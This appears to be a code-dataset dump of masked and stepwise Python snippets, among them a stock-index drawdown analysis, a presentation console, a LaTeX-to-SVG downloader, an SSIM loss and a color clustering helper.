"step-2": "<mask token>\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n index_close_date_after_1month, index_close_date_after_3month,\n index_close_date_after_1year]).T)\n<mask token>\nresult\n",
"step-3": "<mask token>\nthsLogin = THS_iFinDLogin('iFind账号', 'iFind账号密码')\nindex_list = ['000001.SH', '399001.SZ', '399006.SZ']\nresult = pd.DataFrame()\ntoday = datetime.today().strftime('%Y-%m-%d')\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n index_close_date_after_1month, index_close_date_after_3month,\n 
index_close_date_after_1year]).T)\nresult.columns = ['指数代码', '大跌日', '大跌日点数', '一个月后点数', '三个月后点数', '一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌一年后涨跌幅'] = result['一年后点数'] / result['大跌日点数'] * 100 - 100\nresult\n",
"step-4": "import pandas as pd\nfrom datetime import datetime\nfrom iFinDPy import *\nthsLogin = THS_iFinDLogin('iFind账号', 'iFind账号密码')\nindex_list = ['000001.SH', '399001.SZ', '399006.SZ']\nresult = pd.DataFrame()\ntoday = datetime.today().strftime('%Y-%m-%d')\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n 
index_close_date_after_1month, index_close_date_after_3month,\n index_close_date_after_1year]).T)\nresult.columns = ['指数代码', '大跌日', '大跌日点数', '一个月后点数', '三个月后点数', '一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌一年后涨跌幅'] = result['一年后点数'] / result['大跌日点数'] * 100 - 100\nresult\n",
"step-5": "import pandas as pd\nfrom datetime import datetime\nfrom iFinDPy import *\n\n\n\nthsLogin = THS_iFinDLogin(\"iFind账号\",\"iFind账号密码\")\n\n\nindex_list = ['000001.SH','399001.SZ','399006.SZ']\nresult = pd.DataFrame()\ntoday =datetime.today().strftime('%Y-%m-%d')\n\nfor index in index_list: \n data_js = THS_DateSerial(index,'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index',';;;',\\\n 'Days:Tradedays,Fill:Previous,Interval:D,block:history','2000-01-01',today,True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df['ths_pre_close_index'] * 100 - 100\n result_pd = data_df[(data_df['close_chg'] < -5)]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index,str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE','dateType:1,period:D,offset:30,dateFormat:0,output:singledate',date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE','dateType:1,period:D,offset:90,dateFormat:0,output:singledate',date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE','dateType:1,period:D,offset:365,dateFormat:0,output:singledate',date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'):\n continue\n index_close_date = THS_BasicData(index,'ths_close_price_index',date)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,'ths_close_price_index',date_after_1month)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,'ths_close_price_index',date_after_3month)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,'ths_close_price_index',date_after_1year)['tables'][0]['table']['ths_close_price_index'][0]\n result = 
result.append(pd.DataFrame([index,date,index_close_date,index_close_date_after_1month,index_close_date_after_3month,index_close_date_after_1year]).T)\nresult.columns = ['指数代码','大跌日','大跌日点数','一个月后点数','三个月后点数','一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数']/result['大跌日点数'] *100 -100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数']/result['大跌日点数'] *100 -100\nresult['大跌一年后涨跌幅'] = result['一年后点数']/result['大跌日点数'] *100 -100\nresult",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# 1.Create a list of 10 elements of four different data types like int, string, complex and float.
i=[1,2,3,4,5,6,7,8,9,10]
f=[10.5,12.2,13.7,14.9,14.9,18.8,19.7,23.6,90.9,25.7]
s=['Arpi','world','Hello','Python','Consultadd','job','c++','Concepts','interesting']
c=[1+2j,2+3j,4+5j,5+6j,56+7j,8+9j,7+8j,3+6j,7+9j]
print(c)
|
normal
|
{
"blob_id": "87d1c28819d187944a3cf99b35b1d41eab11b139",
"index": 6652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(c)\n",
"step-3": "i = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nf = [10.5, 12.2, 13.7, 14.9, 14.9, 18.8, 19.7, 23.6, 90.9, 25.7]\ns = ['Arpi', 'world', 'Hello', 'Python', 'Consultadd', 'job', 'c++',\n 'Concepts', 'interesting']\nc = [1 + 2.0j, 2 + 3.0j, 4 + 5.0j, 5 + 6.0j, 56 + 7.0j, 8 + 9.0j, 7 + 8.0j,\n 3 + 6.0j, 7 + 9.0j]\nprint(c)\n",
"step-4": "# 1.Create a list of 10 elements of four different data types like int, string, complex and float.\n\ni=[1,2,3,4,5,6,7,8,9,10]\nf=[10.5,12.2,13.7,14.9,14.9,18.8,19.7,23.6,90.9,25.7]\ns=['Arpi','world','Hello','Python','Consultadd','job','c++','Concepts','interesting']\nc=[1+2j,2+3j,4+5j,5+6j,56+7j,8+9j,7+8j,3+6j,7+9j]\nprint(c)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# presentation console
# - a python interpreter for "pseudo-interative" demos
#
# usage: $ python prescons.py <filename>
#
# <filename> should be a file that contains python code as would be entered
# directly in a terminal - see example.py
#
# while running, press 'space' to move through the code
#
# github.com/inglesp/prescons
from code import InteractiveConsole
from StringIO import StringIO
import sys, termios, tty
# get character from stdin
# based on http://code.activestate.com/recipes/134892/
# *nix only, and doesn't handle arrow keys well
def getch(ch=None):
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
while True:
tty.setraw(fd)
gotch = sys.stdin.read(1)
if ch is None or gotch == ch:
break
if ord(gotch) == 3:
raise KeyboardInterrupt
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# subclasses InteractiveConsole from code module
class PresentationConsole(InteractiveConsole):
def __init__(self, path):
self.file = open(path)
InteractiveConsole.__init__(self)
def raw_input(self, prompt=''):
self.write(prompt)
if prompt == sys.ps1:
try:
getch(' ')
except KeyboardInterrupt:
print "KeyboardInterrupt"
exec "import ipdb; ipdb.set_trace()" in self.locals
line = self.file.readline()
if len(line) == 0:
self.file.close()
raise EOFError
self.write(line)
return line.rstrip()
def runcode(self, code):
sys.stdout = StringIO()
InteractiveConsole.runcode(self, code)
output = sys.stdout.getvalue()
sys.stdout = sys.__stdout__
if len(output) > 0:
getch(' ')
self.write(output)
if __name__ == '__main__':
path = sys.argv[1]
console = PresentationConsole(path)
console.interact()
|
normal
|
{
"blob_id": "fa531e8b07de6ee3c22146904ee8724cefab9033",
"index": 2732,
"step-1": "# presentation console\n# - a python interpreter for \"pseudo-interative\" demos\n#\n# usage: $ python prescons.py <filename>\n#\n# <filename> should be a file that contains python code as would be entered\n# directly in a terminal - see example.py\n#\n# while running, press 'space' to move through the code\n#\n# github.com/inglesp/prescons\n\nfrom code import InteractiveConsole\nfrom StringIO import StringIO\nimport sys, termios, tty\n\n# get character from stdin\n# based on http://code.activestate.com/recipes/134892/\n# *nix only, and doesn't handle arrow keys well\ndef getch(ch=None):\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n while True:\n tty.setraw(fd)\n gotch = sys.stdin.read(1)\n if ch is None or gotch == ch:\n break\n if ord(gotch) == 3:\n raise KeyboardInterrupt\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\n# subclasses InteractiveConsole from code module\nclass PresentationConsole(InteractiveConsole):\n def __init__(self, path):\n self.file = open(path)\n InteractiveConsole.__init__(self)\n\n def raw_input(self, prompt=''):\n self.write(prompt)\n if prompt == sys.ps1:\n try:\n getch(' ')\n except KeyboardInterrupt:\n print \"KeyboardInterrupt\"\n exec \"import ipdb; ipdb.set_trace()\" in self.locals\n line = self.file.readline()\n if len(line) == 0:\n self.file.close()\n raise EOFError\n self.write(line)\n return line.rstrip()\n\n def runcode(self, code):\n sys.stdout = StringIO()\n InteractiveConsole.runcode(self, code)\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n if len(output) > 0:\n getch(' ')\n self.write(output)\n\nif __name__ == '__main__':\n path = sys.argv[1]\n console = PresentationConsole(path)\n console.interact()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
<|reserved_special_token_0|>
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
imgs = parseTex(imgs)
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
import requests
import toml
from pathlib import Path
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
imgs = parseTex(imgs)
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
import requests
import toml
from pathlib import Path
imgs:list
config:dict
def parseTex(lines:list):
new_lines = []
for i, line in enumerate(lines):
if line == "\n":
continue
inline = False
if (line[0] == "$" and line[1] != "$"):
inline = True
line = line.replace("$", "")
line = line.replace("\n", "")
line = line.replace(" ", "&space;")
line = line.replace("+", "+")
new_lines.append((line, inline))
return new_lines
def addColor(lines:list, color:str):
colortag = "{\color[RGB]{" + color + "}"
return ["""\inline""" + colortag + line[0] + "}" if(line[1]) else colortag + line[0] + "}" for line in lines]
if Path("config.toml").exists():
with open("config.toml", "r") as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
else:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
with open("tex.txt", "r") as tex:
imgs = tex.readlines()
imgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean
for i, color in enumerate(config["colors"]):
coloredimgs = addColor(imgs, color)
output = "output" / Path(config["outputs"][i])
if (not output.exists()):
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = "https://latex.codecogs.com/svg.latex?" + tex
print(link)
r = requests.get(link)
with open(output / ("latex" + str(j) + ".svg"), "wb") as svg:
svg.write(r.content)
|
flexible
|
{
"blob_id": "dbd04f7b88fa43ae920a6744e3979dbf917d3fc6",
"index": 7649,
"step-1": "<mask token>\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\n<mask token>\n",
"step-2": "<mask token>\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\n<mask token>\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-3": "<mask token>\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\nimgs = parseTex(imgs)\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-4": "import requests\nimport toml\nfrom pathlib import Path\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\nimgs = parseTex(imgs)\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-5": "import requests\nimport toml\nfrom pathlib import Path\n\nimgs:list\nconfig:dict\n\ndef parseTex(lines:list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == \"\\n\":\n continue\n\n inline = False\n if (line[0] == \"$\" and line[1] != \"$\"):\n inline = True\n line = line.replace(\"$\", \"\")\n line = line.replace(\"\\n\", \"\")\n line = line.replace(\" \", \"&space;\")\n line = line.replace(\"+\", \"+\")\n new_lines.append((line, inline))\n return new_lines\n\ndef addColor(lines:list, color:str):\n colortag = \"{\\color[RGB]{\" + color + \"}\"\n return [\"\"\"\\inline\"\"\" + colortag + line[0] + \"}\" if(line[1]) else colortag + line[0] + \"}\" for line in lines]\n\n\n\n\nif Path(\"config.toml\").exists():\n with open(\"config.toml\", \"r\") as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {\"colors\": [\"0, 0, 0\"], \"outputs\": [\"\"]}\nelse:\n config = {\"colors\": [\"0, 0, 0\"], \"outputs\": [\"\"]}\n\nwith open(\"tex.txt\", \"r\") as tex:\n imgs = tex.readlines()\n\nimgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean\nfor i, color in enumerate(config[\"colors\"]):\n coloredimgs = addColor(imgs, color)\n output = \"output\" / Path(config[\"outputs\"][i])\n if (not output.exists()):\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = \"https://latex.codecogs.com/svg.latex?\" + tex\n print(link)\n r = requests.get(link)\n with open(output / (\"latex\" + str(j) + \".svg\"), \"wb\") as svg:\n svg.write(r.content)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
<|reserved_special_token_0|>
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
def __init__(self, window_size=6):
super(Custom_Loss_for_Autoencoder, self).__init__()
self.ssim = pytorch_ssim.SSIM(window_size=window_size)
self.mse = nn.MSELoss()
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
<|reserved_special_token_1|>
import torch
from torch import nn
import pytorch_ssim
class Custom_Loss_for_Autoencoder(nn.Module):
def __init__(self, window_size=6):
super(Custom_Loss_for_Autoencoder, self).__init__()
self.ssim = pytorch_ssim.SSIM(window_size=window_size)
self.mse = nn.MSELoss()
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
|
flexible
|
{
"blob_id": "ce3e2aa2534bb404b45202bcb76e9d07080560cb",
"index": 2739,
"step-1": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n <mask token>\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-3": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n\n def __init__(self, window_size=6):\n super(Custom_Loss_for_Autoencoder, self).__init__()\n self.ssim = pytorch_ssim.SSIM(window_size=window_size)\n self.mse = nn.MSELoss()\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-4": "import torch\nfrom torch import nn\nimport pytorch_ssim\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n\n def __init__(self, window_size=6):\n super(Custom_Loss_for_Autoencoder, self).__init__()\n self.ssim = pytorch_ssim.SSIM(window_size=window_size)\n self.mse = nn.MSELoss()\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def attenuation(color, last_mean):
return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
import math
from utils.util import distance
def attenuation(color, last_mean):
return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
import math
# 计算像素点属于哪个中心点
from utils.util import distance
def attenuation(color, last_mean):
return 1 - math.exp(((distance(color, last_mean) / 80) ** 2) * -1)
def get_Count_By_distance(centers, pixel_use,d):
# d_min设置过低会产生多的中心点,许多很相似但是没有归到一类中
# d_min设置过高产生少的中心点,不相似的归到一类中
d_min = 1;
d_b = d;
count_use = 0;
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use);
if d < d_min:
d_min = d;
count_use = i;
if d_min < d_b:
count = count_use;
